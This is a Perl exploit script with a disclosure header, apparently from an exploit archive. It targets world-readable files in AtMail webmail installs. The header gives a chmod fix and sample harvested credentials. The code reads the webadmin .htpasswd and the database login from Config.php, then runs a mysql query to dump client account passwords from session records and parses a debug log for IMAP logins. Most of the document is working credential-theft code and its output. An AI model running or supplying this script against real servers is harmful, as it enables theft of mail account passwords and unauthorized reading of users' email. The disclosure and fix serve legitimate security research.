atmail-disclose.txt

`#!/usr/bin/perl  
  
################################################################################  
#  
# LEGAL:  
# Permission is granted to freely reproduce this document in its entirety  
# under the condition that the contents are not altered in any way.  
# milw0rm IS permitted to add their standard footer: // milw0rm.com / date  
# Permission to view or reproduce this file is NOT granted to any  
# individual with the first name Gadi and the last name Evron, due to the  
# prior history of at least 1 individual with this name of making false  
# claims that researchers notified them about recently released exploits.  
#  
# PRODUCT:  
# AtMail - atmail.com  
#  
# VENDOR:  
# CalaCode - calacode.com  
#  
# DOWNLOAD:  
# http://atmail.org/download/atmailopen.tgz  
# http://atmail.com/demo/atmailphpdemo.tgz  
#  
# PROBLEM:  
# World readable files in the default install lead to sensitive  
# information disclosure, loss of integrity.  
#  
# SOLUTION:  
# chmod 640 /path/to/Config.php /path/to/.htpasswd  
#  
# NOTIFICATION:  
# 5/27/2008 - Several emails were sent back and forth, explaining how the  
# world readable Config.php issue could be abused. Multiple subsequent  
# attempts to obtain a status update from the vendor were unreplied to.  
# It's now 07/29/2008. Instead of taking a few moments of their time to  
# bring the level of security of the servers this software is installed  
# on back up to the same level it was BEFORE this software was installed  
# (excluding any other vulnerabilities that may exist in this software),  
# the vendor is happily pushing their product at HostingCon at this time.  
# (JULY 28-30, 2008).  
#  
# STATUS:  
# Not fixed.  
#  
# USAGE:  
# ./atmail.pl  
#  
# or simply use it as a CGI script. The vendor claims that ssh access is  
# required to abuse this issue. What they really mean is that all someone  
# needs is the ability to invoke a few commands from the shell. This is  
# easily done in countless ways without requiring authentication via ssh.  
#  
# +----------------------------------------------------+  
# | WEBADMIN USER CREDENTIALS (.htpasswd) |  
# +----------------------------------------------------+  
# admin:$apr1$L.BPJMnK$sjep5SUN4PG5A.Anw5/Id0  
#  
# +----------------------------------------------------+  
# | DATABASE CREDENTIALS (Config.php) |  
# +----------------------------------------------------+  
# USER: atmail  
# PASS: AF4hubB493  
# HOST: localhost  
#  
# +----------------------------------------------------+  
# | CLIENT CREDENTIALS (MySQL) |  
# +----------------------------------------------------+  
# USER: [email protected] PASS: atmail  
# USER: [email protected] PASS: doesn't  
# USER: [email protected] PASS: getit  
#  
# +----------------------------------------------------+  
# | MORE CLIENT CREDENTIALS (/tmp/popimap_debug) |  
# +----------------------------------------------------+  
# USER: alice PASS: atmail  
# USER: bob PASS: doesn't  
# USER: carol PASS: getit  
#  
#  
# ADDED BONUS: client information persists in the database even after the user  
# has logged off.  
#  
# To make this code work, you must fill in the paths. I don't condone  
# malicious use of the information provided in this script, just as I don't  
# condone vendor complacency.  
#  
# If you have found any of this information to be useful to you or someone  
# you know, PLEASE consider donating to the Julie Amero Defense Fund:  
#  
# Official Blog  
# http://julieamer.blogspot.com  
#  
# Trial Transcript  
# http://julieamero.blogspot.com  
#  
# http://google.com/search?q=julie+amero  
#  
# and/or contacting news outlets, state legislators, the prosecution, etc and  
# letting them know your thoughts in a polite and professional manner.  
#  
################################################################################  
  
# print "Content-type: text/plain\n\n";  
  
use strict;  
use warnings;  
  
my $atmail_path = shift || '';  
my $atmail_htpasswd_path = $atmail_path . '';  
my $atmail_config_path = $atmail_path . '';  
my $atmail_popimap_debug = '';  
  
my ( $sql_user, $sql_pass, $sql_host );  
  
-e $atmail_path or die "$atmail_path does not exist\n";  
  
  
###############################################################################  
# For logging into https://example.com/atmail/webadmin  
###############################################################################  
if ( open my $atmail_htpasswd_path_fh, '<', $atmail_htpasswd_path )  
{  
print_line();  
print "|\tWEBADMIN USER CREDENTIALS (.htpasswd) |\n";  
print_line();  
  
while ( <$atmail_htpasswd_path_fh> ) {  
print;  
}  
  
close $atmail_htpasswd_path_fh;  
  
print "\n";  
  
}  
  
###############################################################################  
# For accessing the atmail db  
###############################################################################  
if ( open my $atmail_config_fh, '<', $atmail_config_path )  
{  
print_line();  
print "|\tDATABASE CREDENTIALS (Config.php) |\n";  
print_line();  
  
while ( <$atmail_config_fh> )  
{  
$sql_user = $1 if ( m{ sql_user ' \s => \s ' (.*) ' , }ixms );  
$sql_pass = $1 if ( m{ sql_pass ' \s => \s ' (.*) ' , }ixms );  
$sql_host = $1 if ( m{ sql_host ' \s => \s ' (.*) ' , }ixms );  
}  
  
close $atmail_config_fh;  
  
print "USER: $sql_user\nPASS: $sql_pass\nHOST: $sql_host\n";  
  
print "\n";  
}  
  
###############################################################################  
# For reading grandma's email  
###############################################################################  
my $sessions = "mysql -h $sql_host -u $sql_user -p$sql_pass atmail -e 'select * from UserSession \\G'";  
  
if ( open my $mysql_fh, '-|', $sessions )  
{  
print_line();  
print "|\tCLIENT CREDENTIALS (MySQL) |\n";  
print_line();  
  
while ( <$mysql_fh> )  
{  
if ( m{ Account: \s (\S+) }xms ) {  
print "USER: $1\t";  
}  
elsif ( m{ Password: \s (\S+) }xms ) {  
print "PASS: $1\n";  
}  
}  
  
close $mysql_fh;  
  
print "\n";  
}  
###############################################################################  
# Debugging is not enabled by default, and you do have the choice of  
# configuring the location of the debug log. The default is /tmp/popimap_debug  
# which also presents a symlink attack issue if left to the default setting.  
###############################################################################  
if ( open my $popimap_debug_fh, '<', '/tmp/popimap_debug' )  
{  
my %accounts;  
  
print_line();  
print "|\tMORE CLIENT CREDENTIALS (/tmp/popimap_debug) |\n";  
print_line();  
  
my ( $popimap_debug_user, $popimap_debug_pass );  
  
while ( <$popimap_debug_fh> )  
{  
if ( m{ \A C: \s ATMAIL00 \s LOGIN \s "(.*)" \s "(.*)" }ixms ) {  
$accounts{$1} = $2;  
}  
}  
  
close $popimap_debug_fh;  
  
while ( my ( $user, $pass ) = each ( %accounts ) ) {  
print "USER: $user\tPASS: $pass\n";  
}  
  
print "\n";  
}  
  
sub print_line  
{  
print "+----------------------------------------------------+\n";  
}`